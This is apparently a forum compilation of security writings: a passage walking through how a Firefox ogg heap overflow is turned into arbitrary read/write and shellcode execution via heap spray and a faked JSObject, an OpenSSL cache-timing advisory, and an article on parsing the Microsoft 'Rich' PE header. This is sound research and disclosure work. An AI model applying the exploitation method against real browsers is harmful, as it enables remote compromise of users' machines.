gChunkRTree
In mozJemalloc, memory is divided into chunks, and those chunks are attached to different arenas; an arena manages its chunks. A user-allocated memory block must be inside one of the chunks. In mozJemalloc, a user-allocated memory block is called a region. A chunk is divided into runs of different sizes, and each run bookkeeps the status of the regions inside it through a bitmap structure.
5.1. Arena
In mozJemalloc, each arena is assigned an id. When the allocator needs to allocate a memory chunk, it can use the id to get the corresponding arena. There is a structure called mBin inside the arena. It is an array; each element of it is an arena_bin_t object, and this object manages all memory chunks of the same size in this arena. Memory chunks with sizes from 0x10 to 0x800 are managed by mBin. The runs used by mBin cannot be guaranteed to be contiguous, so mBin uses a red-black tree to manage its runs.
5.2. Run
The first region inside a run is used to save the run's management information, and the rest of the regions can be used for allocation. All regions in the same run have the same size. When a region is allocated from a run, the first not-in-use region closest to the run header is returned.
5.3. Arena Partition
In the current code branch of mozilla-central, all JavaScript memory allocations and frees go through moz_arena_-prefixed functions, and these functions only use the arena whose id is 1. In mozJemalloc, an arena can be a PrivateArena or not; the arena with id 1 is a PrivateArena. This means the ogg buffer will not be in the same arena as JavaScript objects. In this situation, we can say that the JavaScript arena is isolated from the other arenas.
But the vulnerable Windows Firefox 59.0 does not have a PrivateArena, so we can use JavaScript objects to perform heap feng shui and build an exploit. I first debugged an opt+debug build of Firefox on Linux; because of the arena partition, it was hard to find a way to write an exploit there, and so far I can only get an info leak on Linux.

6. Exploit
In this section, I will show how to build an exploit based on this vulnerability.
6.1. Build Ogg file
First of all, we need to build an ogg file which can trigger the vulnerability; part of the PoC ogg file data is as follows:
Pic.4 PoC Ogg file partial data
We can see codebook->dim equals 0x48.
6.2. Heap Spray
First we allocate a lot of JavaScript arrays. This exhausts all usable memory regions in mBin, so mozJemalloc has to map new memory and divide it into runs for mBin. Then we free those arrays in an interleaved fashion, leaving many holes inside mBin. But since we can never know the original layout of mBin, and other objects or threads may be using mBin when we free the arrays, the holes may not actually be interleaved. If the holes are not interleaved, our ogg buffer may be allocated in a contiguous hole, and in that situation we cannot control much of the data. To avoid this, after the interleaved free we should make some compensating allocations in mBin so that the ogg buffer is allocated in a hole right before an array.
6.3. Modify Array Length
After the heap spray, we can use _ogg_malloc to allocate a region in the mozJemalloc heap. So we can force a memory layout as follows:
|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]
When we trigger the out-of-bounds write, we can modify one of the arrays' length, so that we have an array object in mozJemalloc which can read out of bounds. Then we allocate many ArrayBuffer objects in mozJemalloc.
The memory layout turns into the following situation:
|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]
In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents. Finally the memory will look like this:
|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]
6.4. Cola time again
Now we control those objects and we can do:
Array_length_modified: out-of-bounds write, out-of-bounds read.
ArrayBuffer_contents_modified: in-bounds write, in-bounds read.
If we try to leak memory data through Array_length_modified, then because SpiderMonkey uses tagged values, we will read "NaN" from memory. But if we use Array_length_modified to write something into ArrayBuffer_contents_modified and read it back through ArrayBuffer_contents_modified, we can leak pointers of JavaScript objects from memory.
6.5. Fake JSObject
We can fake a JSObject in memory by leaking some pointers and writing them into a JavaScript object, and we can write to an address through this fake object. (Turning off the baseline JIT will help you see what is going on; the following contents are based on the baseline JIT being disabled.)
Pic.5 Fake JavaScript Object
If we allocate two ArrayBuffers of the same size, they will be in contiguous memory inside the JS::Nursery heap. The memory layout will be like the following:
|———————contiguous memory —————————|
[ ArrayBuffer_1 ] [ ArrayBuffer_2 ]
And we can change the first ArrayBuffer's metadata to make SpiderMonkey think it covers the second ArrayBuffer, using the fake object trick:
|———————contiguous memory —————————|
[ ArrayBuffer_1 ] [ ArrayBuffer_2 ]
We can now read/write arbitrary memory. After this, all you need is a ROP chain to get Firefox to your shellcode.
6.6. Pop Calc?
Finally we reach our shellcode; the process context is as follows:
Pic.6 Reaching the shellcode
The corresponding memory chunk information is as follows:
Pic.7 Memory address information
But the Firefox release build has the sandbox enabled by default, so if you try to pop calc through CreateProcess, the sandbox will block it.

7. Related code and works
Firefox Source Code
OR'LYEH? The Shadow over Firefox by argp
Exploiting the jemalloc Memory Allocator: Owning Firefox's Heap by argp, haku
QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi
Sursa: http://blogs.360.cn/blog/how-to-kill-a-firefox-en/
-
From: Billy Brumley <bbrumley () gmail com>
Date: Mon, 16 Apr 2018 19:46:03 +0300

Hey Folks,

We discovered 3 vulnerabilities in OpenSSL that allow cache-timing enabled attackers to recover RSA private keys during key generation.

1. BN_gcd gets called to check that _e_ and _p-1_ are relatively prime. This function is not constant time, and leaks critical GCD state leading to information on _p_.

2. During primality testing, BN_mod_inverse gets called without the BN_FLG_CONSTTIME set during Montgomery arithmetic setup. The resulting code path is not constant time, and leaks critical GCD state leading to information on _p_.

3. During primality testing, BN_mod_exp_mont gets called without the BN_FLG_CONSTTIME set during modular exponentiation, with an exponent _x_ satisfying _p - 1 = 2**k * x_ hence recovering _x_ gives you most of _p_. The resulting code path is not constant time, and leaks critical exponentiation state leading to information on _x_ and hence _p_.

OpenSSL issued CVE-2018-0737 to track this issue.

# Affected software

LibreSSL fixed these issues (nice!) way back when this was reported in Jan 2017. Looks like commits

5a1bc054398ec4d2c33e5bdc3a16eece01c8901d
952c1252f58f5f57227f5efaeec0169759c77d72

We verified that with a debugger.

OTOH, OpenSSL wanted concrete evidence of exploitability. That's what we did over the past year and a half or so. We ran with bug (1) and recovered RSA keys with cache-timings, achieving roughly 30% success rate in over 10K trials on a cluster.

Affects 1.1.0, 1.0.2, and presumably all the EOL lines.

## Fixes

Recently, it looks like (1) was independently discovered, and some code changes happened. Nothing for (2) and (3).
### 1.0.2-stable

Part of the fix for (1) is in commits:

0d6710289307d277ebc3354105c965b6e8ba8eb0
64eb614ccc7ccf30cc412b736f509f1d82bbf897
0b199a883e9170cdfe8e61c150bbaf8d8951f3e7

In combination with our contributed patch in 349a41da1ad88ad87825414752a8ff5fdd6a6c3f, we verified with a debugger that they cumulatively solve (1), (2) and (3).

### 1.1.0-stable

Part of the fix for (1) is in commits:

7150a4720af7913cae16f2e4eaf768b578c0b298
011f82e66f4bf131c733fd41a8390039859aafb2
9db724cfede4ba7a3668bff533973ee70145ec07

In combination with our contributed patch in 6939eab03a6e23d2bd2c3f5e34fe1d48e542e787, we verified with a debugger that they cumulatively solve (1), (2) and (3).

Look for our preprint on http://eprint.iacr.org/ soon -- working title is "One Shot, One Trace, One Key: Cache-Timing Attacks on RSA Key Generation". We'll update the list with the full URL once it's posted.

# Timeline

Jan 2017: Notified OpenSSL, LibreSSL, BoringSSL
4 Apr 2018: Notified OpenSSL again, with PoC and 16 Apr, 15:00 UTC embargo
11 Apr 2018: Notified distros list
16 Apr 2018: Notified oss-security list

Thanks for reading!

Alejandro Cabrera Aldaya
Cesar Pereida Garcia
Luis Manuel Alvarez Tapia
Billy Brumley

Sursa: http://seclists.org/oss-sec/2018/q2/50
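The leaks in (1) and (2) above come from GCD code whose branch sequence depends on secret operand bits. As a rough illustration only (a simplified binary GCD with an explicit branch trace, not OpenSSL's actual implementation), an attacker who can observe which branch executes at each step, e.g. via cache timing, learns information about the operands:

```python
def binary_gcd_trace(a: int, b: int):
    """Simplified binary GCD that records the data-dependent branch taken
    at each step. The branch sequence is a function of the secret operand
    bits, which is why a cache-timing observer of such code can recover
    information about e.g. p-1 during RSA key generation."""
    trace = []
    shift = 0  # number of factors of 2 common to both operands
    while a and b:
        if a % 2 == 0 and b % 2 == 0:
            a, b, shift = a // 2, b // 2, shift + 1
            trace.append("both-even")
        elif a % 2 == 0:
            a //= 2
            trace.append("a-even")
        elif b % 2 == 0:
            b //= 2
            trace.append("b-even")
        elif a >= b:
            a = (a - b) // 2  # both odd, so the difference is even
            trace.append("sub-a")
        else:
            b = (b - a) // 2
            trace.append("sub-b")
    return (a | b) << shift, trace
```

Two inputs with the same GCD generally produce different traces, which is exactly the side channel: the trace, not the result, is what leaks.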
-
The Undocumented Microsoft "Rich" Header

Date: Mar 12, 2017
Last-Modified: Feb 28, 2018

SUMMARY:

There is a bizarre undocumented structure that exists only in Microsoft-produced executables. You may have never noticed the structure even if you've scanned past it a thousand times in a hex dump. This linker-generated structure is present in millions of EXE, DLL and driver modules across the globe built after the late 90's. This was when proprietary features were introduced into both Microsoft compilers and the Microsoft Linker to facilitate its generation. If you view the first 256 bytes of almost any module built with Microsoft development tools (such as Visual C++) or those that ship with the Windows operating system, such as KERNEL32.DLL from Windows XP SP3 (shown below), you can easily spot the signature in a hex viewer. Just look for the word "Rich" after the sequence "This program cannot be run in DOS mode":

00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00  MZ..............  <--DOS header
00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00  ................
00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68  ........!..L.!Th  <--DOS STUB
00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f  is program canno
00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20  t be run in DOS 
00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  mode....$.......
00000080 17 86 20 aa 53 e7 4e f9 53 e7 4e f9 53 e7 4e f9  .. .S.N.S.N.S.N.  <--Start of "Rich" Header
00000090 53 e7 4f f9 d9 e6 4e f9 90 e8 13 f9 50 e7 4e f9  S.O...N.....P.N.
000000A0 90 e8 12 f9 52 e7 4e f9 90 e8 10 f9 52 e7 4e f9  ....R.N.....R.N.
000000B0 90 e8 41 f9 56 e7 4e f9 90 e8 11 f9 8e e7 4e f9  ..A.V.N.......N.
000000C0 90 e8 2e f9 57 e7 4e f9 90 e8 14 f9 52 e7 4e f9  ....W.N.....R.N.
000000D0 52 69 63 68 53 e7 4e f9 00 00 00 00 00 00 00 00  RichS.N.........  <--End of "Rich" header
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000F0 50 45 00 00 4c 01 04 00 2c a1 02 48 00 00 00 00  PE..L...,..H....  <--PE header

When present, the "Rich" signature (DWORD value 0x68636952) can be found sandwiched (maybe "camouflaged" is a better word) between the DOS and PE headers of a Windows PE (portable executable) image. I say camouflaged, because it appears, perhaps by Microsoft's original design, to be part of the 16-bit DOS stub code, which it is not. Since many programmers probably weren't versed in 16-bit assembly even when Microsoft introduced this structure, you could argue the decision to embed something at this particular location in every executable was certainly a strategic one to help it hide in plain sight. In Microsoft-linked executables, not only does the DOS mode string begin at predictable offset 0x4E, but the "Rich" structure always seems to appear at offset 0x80; this makes sense, as the DOS header has probably been hardcoded for quite some time. Oddly enough, the "Rich" signature actually marks the end of the structure's data, whose size varies. Therefore the position of the signature, as well as the total size of the structure, changes from module to module. The 32-bit value that follows the signature not only marks the end of the structure itself, but also happens to be the key that is used to decrypt the structure's data. Following this structure is the PE header, with a handful of zero-padded bytes in between. Since this is an undocumented "feature" of the Microsoft linker, it is not surprising that there is no known option to disable it, short of patching (discussed below). At the time of discovery, all executables built using Microsoft language tools contained this structure (e.g. Visual C++, Visual Basic 6.x and below, MASM, etc.), causing many developers to fear the worst.
Two "seemingly" identical installations of Visual Studio building the same source code appeared to produce executables with differing "Rich" headers. This, combined with the fact that the structure was encrypted, led many to assume that Microsoft was embedding personally identifiable information, ultimately allowing any given executable to be traced back to the machine it was built with. An old 2007 post on the Sysinternals forum refers to this structure as the "Devil's Mark". Also of interest is a 2008 report on Donationcoder that Microsoft utilized the information from this structure as "evidence against several high-profile virus writers". A post from Garage4Hackers said "Microsoft uses compiler ids to prove that a virus is made on a particular machine with a particular compiler. Proving that the person owning the computer is the virus writer". Note that while this structure is present in some .NET executables, it is not present in those that do not make use of the Microsoft linker. For example, an application composed purely of .NET Intermediate Language such as C# does not contain this structure. For any given executable module, you can check for the existence of the "Rich" header (in addition to viewing the decoded fields) using the pelook tool with the -rh option. Before jumping to any conclusions, let's see what Microsoft is hiding here.

AN ARRAY OF NUMERIC VALUES:

First off, the "Rich" header really isn't a header at all. It is a self-contained chunk of data that doesn't reference anything else in the executable, and nothing else in the executable references it. The structure was unofficially referred to as a header because it happens to reside in the PE header area. The structure happens to be little more than an array of 32-bit (DWORD) values between two markers. If one so chooses, the structure can even be safely zeroed-out from the executable without affecting any functionality.
Just ensure you update the PE OptionalHeader's checksum if you alter any bytes in the file, although this is not necessary if the checksum field is zero (disabled). Automated removal is possible through the peupdate tool. More recently, I found that Microsoft's editbin (in version 7.x and up) will also zero-out the "Rich" structure using the undocumented /nostub switch; however, this also removes the PE header offset from the DOS header, effectively breaking the executable. Using editbin is therefore not recommended. Other removal options are discussed in the section Patching the Microsoft Linker below. In the KERNEL32.DLL sample above, the DWORD following the "Rich" sequence happens to have the value 0xF94EE753. This is the XOR key calculated and stored by the linker. It is actually a checksum of the DOS header with the e_lfanew (PE header offset) zeroed out, and additionally includes the values of the unencrypted "Rich" array. Using a checksum with encryption not only obfuscates the values, but also serves as a rudimentary digital signature. If the checksum is calculated from scratch once the values have been decrypted, but doesn't match the stored key, it can be assumed the structure has been tampered with. For those that go the extra step to recalculate the checksum/key, this simple protection mechanism can be bypassed. To decrypt the array, start with the DWORD just prior to the "Rich" sequence and XOR it with the key. Continue the loop backwards, 4 bytes at a time, until the sequence "DanS" (0x536E6144) is decrypted. This value marks the start of the structure, and in practice always seems to reside at offset 0x80. I think a lot of tools that parse the "Rich" structure rely on it starting at offset 0x80. I'd personally recommend against relying on this fact, and instead suggest parsing backwards from the "Rich" signature as described above to handle situations where this may not be the case.
Since this is an undocumented structure, I think it's best to avoid any assumptions such as hardcoded offsets, especially since you must search for the signature "Rich" anyway. With that said, I have yet to encounter an executable where offset 0x80 is not the start; that is, if the structure is present at all. Following the decoding procedure using the KERNEL32.DLL sample shown above, we end up with the following "Rich" structure, where all values have been decrypted and the array is listed beginning at offset 0x80 in ascending order:

OFFSET DATA
------ ----------
0080   0x536E6144  //"DanS" signature (decrypted) / START MARKER
0084   0x00000000  //padding
0088   0x00000000  //padding
008C   0x00000000  //padding
0090   0x00010000  //1st id/value pair  entry #1
0094   0x0000018A  //1st use count      id1=0,uses=394
0098   0x005D0FC3  //2nd id/value pair  entry #2
009C   0x00000003  //2nd use count      id93=4035,uses=3
00A0   0x005C0FC3  //3rd id/value pair  entry #3
00A4   0x00000001  //3rd use count      id92=4035,uses=1
00A8   0x005E0FC3  //4th id/value pair  entry #4
00AC   0x00000001  //4th use count      id94=4035,uses=1
00B0   0x000F0FC3  //5th id/value pair  entry #5
00B4   0x00000005  //5th use count      id15=4035,uses=5
00B8   0x005F0FC3  //6th id/value pair  entry #6
00BC   0x000000DD  //6th use count      id95=4035,uses=221
00C0   0x00600FC3  //7th id/value pair  entry #7
00C4   0x00000004  //7th use count      id96=4035,uses=4
00C8   0x005A0FC3  //8th id/value pair  entry #8
00CC   0x00000001  //8th use count      id90=4035,uses=1
00D0   0x68636952  //"Rich" signature   END MARKER
00D4   0xF94EE753  //XOR key

The array stores entries that are 8 bytes each, broken into 3 members. Each entry represents either a tool that was employed as part of building the executable or a statistic. You'll notice there are some zero-padded DWORDs adjacent to the "DanS" start marker. In practice, Microsoft seems to have wanted the entries to begin on a 16-byte (paragraph) boundary, so the 3 leading padding DWORDs can be safely skipped as not belonging to the data.
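The backwards decoding procedure described above can be sketched in Python. This is a hypothetical helper operating on the raw bytes of a PE file; the function and field names are mine, and the layout assumptions (key DWORD after "Rich", zero padding after "DanS") follow this article's description rather than any official format:

```python
import struct

def parse_rich_header(data: bytes):
    """Decode the 'Rich' structure from raw PE file bytes.

    Walks backwards from the 'Rich' marker, XOR-decrypting one DWORD at a
    time with the key stored after the marker, until 'DanS' is found.
    Returns (key, entries) where each entry is (id, build, use_count),
    or None if the structure is absent."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]   # e_lfanew
    rich_off = data.rfind(b"Rich", 0, pe_off)
    if rich_off == -1:
        return None
    key = struct.unpack_from("<I", data, rich_off + 4)[0]
    values, off, found = [], rich_off - 4, False
    while off >= 0:
        dw = struct.unpack_from("<I", data, off)[0] ^ key
        if dw == 0x536E6144:          # "DanS" start marker
            found = True
            break
        values.append(dw)
        off -= 4
    if not found:
        return None
    values.reverse()                   # back into file order
    while values and values[0] == 0:   # skip padding DWORDs after "DanS"
        values.pop(0)
    entries = []
    for comp_id, count in zip(values[0::2], values[1::2]):
        # high WORD = id, low WORD = tool build number, DWORD = use count
        entries.append((comp_id >> 16, comp_id & 0xFFFF, count))
    return key, entries
```

Run against the KERNEL32.DLL bytes above, the sixth entry would decode to id 95 (0x5F), build 4035 (0x0FC3), use count 221, matching the annotated listing.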
Each 8-byte entry consists of two 16-bit WORD values followed by a 32-bit DWORD. The HIGH order WORD is an id which indicates the entry type. The LOW order WORD contains the build number of the tool being represented (when applicable), or it may be set to zero. The next DWORD is a full 32-bit "use" or "occurrence" count.

THE ID VALUE:

The id value indicates the type of the list entry. For example, a specific id will represent OBJ files generated as a result of the use of a specific version of the C compiler. Different ids represent other tools that were also employed as part of building the final executable, such as the linker. Daniel Pistelli's article, Microsoft's Rich Signature (undocumented), found that the id values are a private enumeration that changes between releases of Visual Studio. I have also found this to be the case, which unfortunately makes them a bit of a moving target to decipher. Besides a couple of exceptions which I'll explain below, the id is emitted by each compiler (or assembler) and is stored within each OBJ (and thus LIB) file linked against, in the form of the "@comp.id" symbol. The "@comp.id" symbol happens to be short for "compiler build number" and "id". In fact, the DWORD value stored as the "@comp.id" symbol is the same DWORD being stored in the first half of applicable "Rich" list entries. I say applicable because not all list entries represent OBJ files. Some ids can appear more than once in the list, while others do not. The id typically represents the following statistics:

OBJ count for specific C compiler (cl.exe)
OBJ count for specific C++ compiler (cl.exe)
OBJ count for specific assembler (ml.exe)
specific linker that built module (link.exe)
specific resource compiler (rc.exe), when RES file linked
imported functions count
MSIL modules
PGO Instrumented modules
and so on...

Most of the entries above have an associated build number of the tool being represented, such as the compiler, assembler and linker.
One exception to this is the imported functions count, which happens to be the total number of imported functions referenced in all DLLs. This is usually the only entry with a build number of zero. Note that the "Rich" structure does not store information on the number of static/private functions within each OBJ/source file. The linker entry is always last in the list and represents the linker that built the module. The resource compiler, when present, is almost always 2nd to last in the list, next to the linker. Both the linker and resource compiler are represented by hardcoded id and build values for each linker release. For example, when a resource script is employed, the linker uses the same id/build pair even if the RES is built from a resource compiler from another version of Visual Studio! Another oddity is that the build value of the resource compiler entry typically does not match the build reported by the rc.exe command line. The correlation of unique build values to specific versions of Visual Studio tools is discussed in more detail below. The linker seems to build most "Rich" structures in the following order, though not necessarily in the order appearing on the command line:

Entries representing LIB files
Entries representing individual OBJ files
Resource Compiler
Linker

At first glance you might guess that each referenced LIB file would represent one entry in the list, but this is not the case. The linker may generate one or more entries for each LIB file, depending on the number of unique "@comp.id" values found within. Since a LIB file is not much more than a concatenation of OBJ files, the resulting "count" member of these entries is the number of OBJ files referenced in the final executable that contain that exact "@comp.id" value. For example, statically linking to the Standard C Library usually generates assembler and C OBJ entries, because that is what constitutes the source files internally used by Microsoft to build LIBCMT.LIB.
When you link against this library, the unique "@comp.id" value-pairs are tallied together and the resulting counts are written to the list. With that in mind, the "Rich" structure in KERNEL32.DLL can be annotated as follows:

id1=0,uses=394      394 imports
id93=4035,uses=3    ???
id92=4035,uses=1    ???
id94=4035,uses=1    1 rc script
id15=4035,uses=5    5 asm sources
id95=4035,uses=221  221 C sources
id96=4035,uses=4    4 C++ sources
id90=4035,uses=1    Linker

Here's another annotated example derived from a minimal C++ application linked with a resource script and the Standard C Library, built from Visual C++ 7.1:

id15=6030,uses=20   20 asm sources
id95=6030,uses=68   68 C sources
id93=2067,uses=2    ???
id93=2179,uses=3    ???
id1=0,uses=3        3 imports
id96=6030,uses=1    1 C++ source
id94=3052,uses=1    1 rc script
id90=6030,uses=1    Linker

Below is my attempt at a partial list of decoded ids from the version 6 and 7 Visual Studio toolsets, based on a little trial and error. Note that many of the ids originate from the LIB files bundled with the associated Visual C++ SDK versions, as the linker only hardcodes a few of the entries at the end of the list. It is also common to see a reference to MASM even when MASM is not utilized directly by a project, as these references are pulled in automatically by the linker or SDK LIB files.
Microsoft Visual Studio 6.0 SP6

ID  MEANING
1   total count of imported DLL functions referenced; build number is always zero
4   seems to be associated when linking against Standard C Library DLL
19  seems to be associated when statically linking against Standard C Library
6   resource compiler; almost always last in list (when RES file used) and use-count always 1
9   count of OBJ files for Visual Basic 6.0 forms
13  count of OBJ files for Visual Basic 6.0 code
10  count of C OBJ files from specific cl.exe compiler
11  count of C++ OBJ files from specific cl.exe compiler
14  count of assembler OBJ files originating from MASM 6.13
18  count of assembler OBJ files originating from MASM 6.14
42  count of assembler OBJ files originating from MASM 6.15

Microsoft Visual Studio 7.1 SP1

ID  MEANING
1   total count of imported DLL functions referenced; build number is always zero; same as in Linker versions 5.0 SP3 and 6.x
15  count of assembler OBJ files originating from MASM 7.x
90  linker; always present and always at end of list; use-count always 1
93  always seems to be present no matter how the executable was built, but doesn't appear to originate from @comp.id symbols (???)
94  resource compiler; almost always 2nd to last in list (when RES file used) and use-count always 1
95  count of C OBJ files from specific cl.exe compiler
96  count of C++ OBJ files from specific cl.exe compiler

Not only do the ids change with each major linker release (sometimes with service packs too), but newer versions of the SDK's LIB files use different and higher id numbers for the same thing, such as the C and C++ compiler. So not only do the build numbers change with each SDK, but the id identifying the type of entry also changes. Unless the idea is to make the header difficult to interpret, the id may be meant to be combined with the build number to provide a unique compiler-that-built-SDK instance statistic, which could be used to trace leaked or BETA versions of tools or SDKs.
The whole system might also double as another check system: if the tool ids and reported build versions don't match known publicly released pairs, this would be another indication the entries in the list were tampered with. Without any official word from Microsoft, some of this is pure speculation. The good news is that if you are only interested in detecting modern versions of Visual Studio (7.x and up), the id member can be completely ignored! More information about detection is presented below.

WHEN DID MICROSOFT INTRODUCE THE "RICH"-ENABLED LINKER?

The short answer is in 1998, with Visual Studio 6.0 (LINK 6.x). The long answer is the final Service Pack for Visual Studio 5.0; that is, the version 5.10.7303 linker introduced with SP3 in 1997 was the first "Rich"-capable linker. The catch was that the list this linker produced was practically empty, because the compilers at the time (e.g. Visual C++ 5.x, MASM 6.12) did not yet emit the "@comp.id" symbol to the OBJ files. Not surprisingly, the LIB files that shipped with the product's SDK were also missing the "@comp.id" symbol. The result was a "Rich" structure with either a single entry for the imports, or with an additional entry to represent a compiled resource script. If, however, you link a Visual C++ 6.0 OBJ file with the older 5.0 SP3 (5.10.7303) linker, you will get a proper "Rich" structure, because the 6.0 OBJ file contains the "@comp.id" symbol with build information. The 6.0 OBJ files were, however, incompatible with the 5.0 SP2 and earlier linkers; if you attempted to link-in any of these modules using the older linkers, you would run into the error LNK1106: "invalid file or disk full: cannot seek to 0xXXXXXXXX". This is an indication that in 1997, Microsoft changed the OBJ file format. In summary, the Visual C++ 5.0 SP3 linker and the linker that would be released next with Visual C++ 6.0 both supported a new type of OBJ file.
Specifically, the OBJ files that would facilitate the generation of this new "Rich" structure.

CHANGELIST:

Visual Studio 97 (5.0) SP3 (1997): First linker capable of producing the "Rich" header and supporting the new OBJ format to be released with the not-yet-public VC++ 6.0 compiler (cl.exe 12.x); however, compilers at the time did not yet support writing "@comp.id" to OBJ files, so the list had minimal information.

Visual Studio 6.x (1998): Microsoft compilers, including Visual Basic, now support writing the "@comp.id" symbol to OBJ files; bundled SDK LIB files now contain "@comp.id" build information; as a result, executables built using the Visual C++ 6.0 compiler and linker now get the first "proper" "Rich" headers.

Visual Studio 7.0 .NET (2002): Linker now appends its own entry to the list, and it is always last; fortunately we now have a predictable entry that is retained in future versions.

BUILD NUMBERS FOR DETECTION:

Before continuing further, I want to stress an important point. There is little preventing someone from either tampering with or completely falsifying the "Rich" header. While this structure may provide useful information for the majority of executables, other signature methods should be utilized in conjunction where accuracy is paramount. Some of these methods may include searching for specific patterns in the headers and/or analysis of the entry-point code. For example, the Borland and Watcom linkers can be identified by specific patterns unique to each in their DOS stubs. The presence of a "Rich" header, or lack thereof, doesn't mean Microsoft's linker cannot be detected by other clues. A typical version number for a Microsoft product consists of major and minor numbers (one byte each) followed by a 16-bit build number, and sometimes another 16-bit sub-version number. Since we primarily have the build number for each "Rich" entry to go by, how might we distinguish a specific version of Visual Studio from this information?
There are at least 3 ways:

1. The MajorLinkerVersion and MinorLinkerVersion members of the PE's OptionalHeader can be combined with the last entry in the "Rich" list (if MajorLinkerVersion >= 7) to construct the full version of the linker. Once the linker is known, one can assume the version of Visual Studio including that linker was responsible for building the executable, even if not all inputs came from this version.

2. The build numbers for each release of Visual Studio are almost completely unique, which allows build numbers to identify a specific version of the toolset used; that is, for ids besides the linker. The one exception I'm aware of is build number 50727. This build number was issued to public releases of both Visual Studio 2005 and 2012. As mentioned above, you might make the distinction by checking the PE MajorLinkerVersion and testing it for 8 and 11 respectively, to at least determine the full version of the linker.

3. Because the entry type ids change between releases of Visual Studio, the id in combination with the build number can be used to uniquely identify a version of Visual Studio.

Based on the information above, if you want to detect versions of Visual Studio 7.0 and up, things couldn't be easier. If the MajorLinkerVersion in the PE's OptionalHeader is 7 or greater, indicating Visual Studio .NET 7.0 (2002) and up, the last entry in the list always represents the linker that built the module. If that build number corresponds to a known version of Visual Studio, you might consider it safe to assume the compiler is also from the same toolset. As for versions of Visual Studio supporting the "Rich" structure prior to 7.0, the detection rules were a little different, because no linker entry was written to the end of the "Rich" list. Perhaps Microsoft figured it was enough that the PE header contained the Major and Minor version for the linker, and the build number was not important enough to include.
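As a toy illustration of the second approach, including its one known ambiguity, the helper below maps a "Rich" linker-entry build number to a toolset using the PE OptionalHeader's MajorLinkerVersion as the tiebreaker. The function name is mine, and the deliberately tiny table holds only a few build numbers taken from this article:

```python
def vs_from_linker_build(build: int, major_linker_version: int) -> str:
    """Map a 'Rich' linker-entry build number to a Visual Studio release.

    Build 50727 was shipped by both VS 2005 (linker 8.x) and VS 2012
    (linker 11.x), so the PE MajorLinkerVersion is needed to tell them
    apart. Illustration only; a real tool needs the full lookup table."""
    if build == 50727:
        if major_linker_version == 8:
            return "Visual Studio 2005 (8.0)"
        if major_linker_version == 11:
            return "Visual Studio 2012 (11.0)"
        return "unknown 50727 variant"
    known = {
        4035:  "Visual Studio .NET 2003 (7.1)",
        6030:  "Visual Studio .NET 2003 SP1 (7.1)",
        21022: "Visual Studio 2008 (9.0)",
        30319: "Visual Studio 2010 (10.0)",
    }
    return known.get(build, "unknown")
```

For the KERNEL32.DLL sample above, the last entry's build number 4035 would resolve to the 7.1 toolset regardless of the tiebreaker.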
It is interesting to note that the id and build versions embedded within the publicly shipped SDK LIB files are those of non-public releases of Microsoft compilers; this makes sense because Microsoft builds its SDKs internally, but it happens to be a good thing for detection. It allows us to distinguish the SDK's compiler id/build pairs from the pairs that represent the compilers responsible for building the executable. In other words, once you can identify the linker entry and the entries that represent the SDK LIB files (because they are not recognized public versions; see table below), the only things left are the compiler entries we want to use for detection! You will then be able to determine the language used to build an executable, whether it be C, C++, MASM or all in combination, in addition to the toolset version of each. All of this is assuming you want to use the build numbers alone for detection, rather than hardcoding the differing tool ids per version of Visual Studio to combine with the build numbers. Going back to the KERNEL32.DLL example above, we can see the last entry's build number is 4035, which corresponds to one of the known public Microsoft 7.1 linkers. Using a lookup table, such as that shown below, applications can use this information to correlate [mostly] unique build numbers to known Microsoft Visual Studio toolsets.
MASM 6.x BUILDS

BUILD  PRODUCT VERSION
7299   6.13.7299
8444   6.14.8444
8803   6.15.8803

Visual Basic 6.0 BUILDS

BUILD  PRODUCT VERSION
8169   6.0 (also reported with SP1 and SP2)
8495   6.0 SP3
8877   6.0 SP4
8964   6.0 SP5
9782   6.0 SP6 (same as reported by VC++ but different id)

VISUAL STUDIO BUILDS

BUILD                 PRODUCT VERSION           CL VERSION      LINK VERSION
8168                  6.0 (RTM, SP1 or SP2)     12.00.8168      6.00.8168
8447                  6.0 SP3                   12.00.8168      6.00.8447
8799                  6.0 SP4                   12.00.8804      6.00.8447
8966                  6.0 SP5                   12.00.8804      6.00.8447
9044                  6.0 SP5 Processor Pack    12.00.8804      6.00.8447
9782                  6.0 SP6                   12.00.8804      6.00.8447
9466                  7.0 2002                  13.00.9466      7.00.9466
9955                  7.0 2002 SP1              13.00.9466      7.00.9955
3077                  7.1 2003                  13.10.3077      7.10.3077
3052                  7.1 2003 Free Toolkit     13.10.3052      7.10.3052
4035                  7.1 2003                  13.10.4035      (SDK/DDK?)
6030                  7.1 2003 SP1              13.10.6030      7.10.6030
50327                 8.0 2005 (Beta)           ?               ?
50727 (linkver 8.x)   8.0 2005                  14.00.50727.42  14.00.50727.762 SP1?
21022                 9.0 2008                  15.00.21022
30729                 9.0 2008 SP1              15.00.30729.01
30319                 10.0 2010                 16.00.30319
40219                 10.0 2010 SP1             16.00.40219
50727 (linkver 11.x)  11.0 2012                 17.00.50727
51025                 11.0 2012                 17.00.51025
51106                 11.0 2012 update 1        17.00.51106
60315                 11.0 2012 update 2        17.00.60315
60610                 11.0 2012 update 3        17.00.60610
61030                 11.0 2012 update 4        17.00.61030
21005                 12.0 2013                 18.00.21005
30501                 12.0 2013 update 2        18.00.30501
40629                 12.0 2013 SP5             18.00.40629 SP5
22215                 14.0 2015                 19.00.22215 Preview
23506                 14.0 2015 SP1             19.00.23506 SP1
23824                 14.0 2015 update 2        (unverified)
24215                 14.0 2015                 19.00.24215.1 (unverified)

